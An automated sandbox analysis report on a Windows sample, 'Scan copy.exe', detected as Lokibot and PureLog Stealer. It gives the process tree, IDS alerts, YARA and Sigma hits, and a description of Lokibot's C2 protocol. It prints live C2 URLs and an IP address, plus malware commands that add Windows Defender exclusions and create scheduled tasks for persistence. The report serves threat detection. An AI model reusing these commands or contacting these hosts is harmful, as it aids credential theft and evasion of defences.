Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Scan copy.exe

Overview

General Information

Sample name:Scan copy.exe
Analysis ID:1564386
MD5:8c4da707092623f03586e61f56755840
SHA1:69be0cb3d2d2a7930c675449636d988f22d5f1e7
SHA256:43e710d54cc34ae668a10b0ce9e89fd4f7d147cef34c7d44275ec96be9cfb901
Tags:exeuser-julianmckein
Infos:

Detection

Lokibot, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Lokibot
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses schtasks.exe or at.exe to add and modify task schedules
Yara detected aPLib compressed binary
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Scan copy.exe (PID: 5420 cmdline: "C:\Users\user\Desktop\Scan copy.exe" MD5: 8C4DA707092623F03586E61F56755840)
    • powershell.exe (PID: 6648 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5504 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 1204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7552 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7172 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7220 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Scan copy.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\Scan copy.exe" MD5: 8C4DA707092623F03586E61F56755840)
  • vLQwEscoQr.exe (PID: 7512 cmdline: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe MD5: 8C4DA707092623F03586E61F56755840)
    • schtasks.exe (PID: 7992 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vLQwEscoQr.exe (PID: 8048 cmdline: "C:\Users\user\AppData\Roaming\vLQwEscoQr.exe" MD5: 8C4DA707092623F03586E61F56755840)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.41/simple/five/fre.php"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x17cc8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          0000000D.00000002.1349197603.00000000041EC000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x5093:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 46 entries
          SourceRuleDescriptionAuthorStrings
          0.2.Scan copy.exe.51b0000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            0.2.Scan copy.exe.51b0000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              13.2.vLQwEscoQr.exe.41ec8d8.1.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
                13.2.vLQwEscoQr.exe.41ec8d8.1.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                13.2.vLQwEscoQr.exe.41ec8d8.1.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 52 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", ProcessId: 6648, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", ProcessId: 6648, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe, ParentImage: C:\Users\user\AppData\Roaming\vLQwEscoQr.exe, ParentProcessId: 7512, ParentProcessName: vLQwEscoQr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp2BF7.tmp", ProcessId: 7992, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", ProcessId: 7172, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Scan copy.exe", ProcessId: 6648, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Scan copy.exe", ParentImage: C:\Users\user\Desktop\Scan copy.exe, ParentProcessId: 5420, ParentProcessName: Scan copy.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vLQwEscoQr" /XML "C:\Users\user\AppData\Local\Temp\tmp18EC.tmp", ProcessId: 7172, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:14:16.413073+010020243121A Network Trojan was detected192.168.2.74970394.156.177.4180TCP
                2024-11-28T09:14:18.371332+010020243121A Network Trojan was detected192.168.2.74970594.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:14:15.096111+010020253811Malware Command and Control Activity Detected192.168.2.74970394.156.177.4180TCP
                2024-11-28T09:14:16.856131+010020253811Malware Command and Control Activity Detected192.168.2.74970594.156.177.4180TCP
                2024-11-28T09:14:18.697511+010020253811Malware Command and Control Activity Detected192.168.2.74970794.156.177.4180TCP
                2024-11-28T09:14:20.351381+010020253811Malware Command and Control Activity Detected192.168.2.74970994.156.177.4180TCP
                2024-11-28T09:14:22.160780+010020253811Malware Command and Control Activity Detected192.168.2.74971094.156.177.4180TCP
                2024-11-28T09:14:23.860632+010020253811Malware Command and Control Activity Detected192.168.2.74971694.156.177.4180TCP
                2024-11-28T09:14:25.519659+010020253811Malware Command and Control Activity Detected192.168.2.74972294.156.177.4180TCP
                2024-11-28T09:14:27.668725+010020253811Malware Command and Control Activity Detected192.168.2.74973094.156.177.4180TCP
                2024-11-28T09:14:29.385370+010020253811Malware Command and Control Activity Detected192.168.2.74973394.156.177.4180TCP
                2024-11-28T09:14:31.235320+010020253811Malware Command and Control Activity Detected192.168.2.74973994.156.177.4180TCP
                2024-11-28T09:14:33.051469+010020253811Malware Command and Control Activity Detected192.168.2.74974594.156.177.4180TCP
                2024-11-28T09:14:34.797317+010020253811Malware Command and Control Activity Detected192.168.2.74975094.156.177.4180TCP
                2024-11-28T09:14:36.663456+010020253811Malware Command and Control Activity Detected192.168.2.74975594.156.177.4180TCP
                2024-11-28T09:14:38.518570+010020253811Malware Command and Control Activity Detected192.168.2.74976094.156.177.4180TCP
                2024-11-28T09:14:40.330195+010020253811Malware Command and Control Activity Detected192.168.2.74976494.156.177.4180TCP
                2024-11-28T09:14:42.534473+010020253811Malware Command and Control Activity Detected192.168.2.74977094.156.177.4180TCP
                2024-11-28T09:14:44.345691+010020253811Malware Command and Control Activity Detected192.168.2.74977594.156.177.4180TCP
                2024-11-28T09:14:46.159487+010020253811Malware Command and Control Activity Detected192.168.2.74977994.156.177.4180TCP
                2024-11-28T09:14:48.063766+010020253811Malware Command and Control Activity Detected192.168.2.74978594.156.177.4180TCP
                2024-11-28T09:14:49.922881+010020253811Malware Command and Control Activity Detected192.168.2.74979194.156.177.4180TCP
                2024-11-28T09:14:51.737036+010020253811Malware Command and Control Activity Detected192.168.2.74979594.156.177.4180TCP
                2024-11-28T09:14:53.691338+010020253811Malware Command and Control Activity Detected192.168.2.74979994.156.177.4180TCP
                2024-11-28T09:14:55.562437+010020253811Malware Command and Control Activity Detected192.168.2.74980494.156.177.4180TCP
                2024-11-28T09:14:57.414725+010020253811Malware Command and Control Activity Detected192.168.2.74980894.156.177.4180TCP
                2024-11-28T09:14:59.272741+010020253811Malware Command and Control Activity Detected192.168.2.74981494.156.177.4180TCP
                2024-11-28T09:15:01.091239+010020253811Malware Command and Control Activity Detected192.168.2.74982094.156.177.4180TCP
                2024-11-28T09:15:02.750976+010020253811Malware Command and Control Activity Detected192.168.2.74982394.156.177.4180TCP
                2024-11-28T09:15:04.611133+010020253811Malware Command and Control Activity Detected192.168.2.74982994.156.177.4180TCP
                2024-11-28T09:15:06.425627+010020253811Malware Command and Control Activity Detected192.168.2.74983394.156.177.4180TCP
                2024-11-28T09:15:08.283034+010020253811Malware Command and Control Activity Detected192.168.2.74983994.156.177.4180TCP
                2024-11-28T09:15:10.092587+010020253811Malware Command and Control Activity Detected192.168.2.74984494.156.177.4180TCP
                2024-11-28T09:15:11.986718+010020253811Malware Command and Control Activity Detected192.168.2.74984994.156.177.4180TCP
                2024-11-28T09:15:13.869864+010020253811Malware Command and Control Activity Detected192.168.2.74985494.156.177.4180TCP
                2024-11-28T09:15:15.847454+010020253811Malware Command and Control Activity Detected192.168.2.74985994.156.177.4180TCP
                2024-11-28T09:15:17.771783+010020253811Malware Command and Control Activity Detected192.168.2.74986494.156.177.4180TCP
                2024-11-28T09:15:19.671910+010020253811Malware Command and Control Activity Detected192.168.2.74986994.156.177.4180TCP
                2024-11-28T09:15:21.490327+010020253811Malware Command and Control Activity Detected192.168.2.74987494.156.177.4180TCP
                2024-11-28T09:15:23.380781+010020253811Malware Command and Control Activity Detected192.168.2.74988094.156.177.4180TCP
                2024-11-28T09:15:25.077799+010020253811Malware Command and Control Activity Detected192.168.2.74988594.156.177.4180TCP
                2024-11-28T09:15:26.899973+010020253811Malware Command and Control Activity Detected192.168.2.74988994.156.177.4180TCP
                2024-11-28T09:15:28.747512+010020253811Malware Command and Control Activity Detected192.168.2.74989394.156.177.4180TCP
                2024-11-28T09:15:30.655415+010020253811Malware Command and Control Activity Detected192.168.2.74989894.156.177.4180TCP
                2024-11-28T09:15:32.556717+010020253811Malware Command and Control Activity Detected192.168.2.74990394.156.177.4180TCP
                2024-11-28T09:15:34.408050+010020253811Malware Command and Control Activity Detected192.168.2.74990994.156.177.4180TCP
                2024-11-28T09:15:36.267971+010020253811Malware Command and Control Activity Detected192.168.2.74991494.156.177.4180TCP
                2024-11-28T09:15:38.156180+010020253811Malware Command and Control Activity Detected192.168.2.74991894.156.177.4180TCP
                2024-11-28T09:15:39.816583+010020253811Malware Command and Control Activity Detected192.168.2.74992294.156.177.4180TCP
                2024-11-28T09:15:41.597339+010020253811Malware Command and Control Activity Detected192.168.2.74992894.156.177.4180TCP
                2024-11-28T09:15:43.294626+010020253811Malware Command and Control Activity Detected192.168.2.74993094.156.177.4180TCP
                2024-11-28T09:15:45.140468+010020253811Malware Command and Control Activity Detected192.168.2.74993594.156.177.4180TCP
                2024-11-28T09:15:46.988970+010020253811Malware Command and Control Activity Detected192.168.2.74993894.156.177.4180TCP
                2024-11-28T09:15:48.663942+010020253811Malware Command and Control Activity Detected192.168.2.74994394.156.177.4180TCP
                2024-11-28T09:15:50.622383+010020253811Malware Command and Control Activity Detected192.168.2.74994894.156.177.4180TCP
                2024-11-28T09:15:52.328756+010020253811Malware Command and Control Activity Detected192.168.2.74995294.156.177.4180TCP
                2024-11-28T09:15:54.218254+010020253811Malware Command and Control Activity Detected192.168.2.74995894.156.177.4180TCP
                2024-11-28T09:15:55.988730+010020253811Malware Command and Control Activity Detected192.168.2.74996294.156.177.4180TCP
                2024-11-28T09:15:57.686634+010020253811Malware Command and Control Activity Detected192.168.2.74996694.156.177.4180TCP
                2024-11-28T09:15:59.487158+010020253811Malware Command and Control Activity Detected192.168.2.74997194.156.177.4180TCP
                2024-11-28T09:16:01.189356+010020253811Malware Command and Control Activity Detected192.168.2.74997694.156.177.4180TCP
                2024-11-28T09:16:02.889650+010020253811Malware Command and Control Activity Detected192.168.2.74998294.156.177.4180TCP
                2024-11-28T09:16:04.587142+010020253811Malware Command and Control Activity Detected192.168.2.74998794.156.177.4180TCP
                2024-11-28T09:16:06.389002+010020253811Malware Command and Control Activity Detected192.168.2.74999094.156.177.4180TCP
                2024-11-28T09:16:08.095796+010020253811Malware Command and Control Activity Detected192.168.2.74999594.156.177.4180TCP
                2024-11-28T09:16:09.797793+010020253811Malware Command and Control Activity Detected192.168.2.75000094.156.177.4180TCP
                2024-11-28T09:16:11.614597+010020253811Malware Command and Control Activity Detected192.168.2.75000494.156.177.4180TCP
                2024-11-28T09:16:13.446836+010020253811Malware Command and Control Activity Detected192.168.2.75000994.156.177.4180TCP
                2024-11-28T09:16:15.111182+010020253811Malware Command and Control Activity Detected192.168.2.75001294.156.177.4180TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-28T09:14:20.086493+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749707TCP
                2024-11-28T09:14:21.861763+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749709TCP
                2024-11-28T09:14:23.596377+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749710TCP
                2024-11-28T09:14:25.257595+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749716TCP
                2024-11-28T09:14:27.389087+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749722TCP
                2024-11-28T09:14:29.117592+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749730TCP
                2024-11-28T09:14:30.973009+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749733TCP
                2024-11-28T09:14:32.778682+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749739TCP
                2024-11-28T09:14:34.531967+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749745TCP
                2024-11-28T09:14:36.377840+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749750TCP
                2024-11-28T09:14:38.246285+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749755TCP
                2024-11-28T09:14:40.066664+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749760TCP
                2024-11-28T09:14:41.915448+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749764TCP
                2024-11-28T09:14:44.077722+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749770TCP
                2024-11-28T09:14:45.883417+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749775TCP
                2024-11-28T09:14:47.792085+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749779TCP
                2024-11-28T09:14:49.654366+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749785TCP
                2024-11-28T09:14:51.466613+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749791TCP
                2024-11-28T09:14:53.334685+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749795TCP
                2024-11-28T09:14:55.291439+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749799TCP
                2024-11-28T09:14:57.142377+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749804TCP
                2024-11-28T09:14:59.006862+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749808TCP
                2024-11-28T09:15:00.818473+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749814TCP
                2024-11-28T09:15:02.484511+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749820TCP
                2024-11-28T09:15:04.341290+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749823TCP
                2024-11-28T09:15:06.156297+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749829TCP
                2024-11-28T09:15:08.018341+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749833TCP
                2024-11-28T09:15:09.822079+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749839TCP
                2024-11-28T09:15:11.725316+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749844TCP
                2024-11-28T09:15:13.598708+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749849TCP
                2024-11-28T09:15:15.573387+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749854TCP
                2024-11-28T09:15:17.427062+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749859TCP
                2024-11-28T09:15:19.401939+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749864TCP
                2024-11-28T09:15:21.216237+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749869TCP
                2024-11-28T09:15:23.114781+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749874TCP
                2024-11-28T09:15:24.819027+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749880TCP
                2024-11-28T09:15:26.618766+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749885TCP
                2024-11-28T09:15:28.491168+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749889TCP
                2024-11-28T09:15:30.394237+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749893TCP
                2024-11-28T09:15:32.287996+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749898TCP
                2024-11-28T09:15:34.139340+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749903TCP
                2024-11-28T09:15:35.995187+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749909TCP
                2024-11-28T09:15:37.897834+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749914TCP
                2024-11-28T09:15:39.552495+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749918TCP
                2024-11-28T09:15:41.329580+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749922TCP
                2024-11-28T09:15:43.036876+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749928TCP
                2024-11-28T09:15:44.878631+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749930TCP
                2024-11-28T09:15:46.725331+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749935TCP
                2024-11-28T09:15:48.384986+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749938TCP
                2024-11-28T09:15:50.300740+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749943TCP
                2024-11-28T09:15:52.047991+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749948TCP
                2024-11-28T09:15:53.958941+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749952TCP
                2024-11-28T09:15:55.697992+010020254831A Network Trojan was detected94.156.177.4180192.168.2.749958TCP
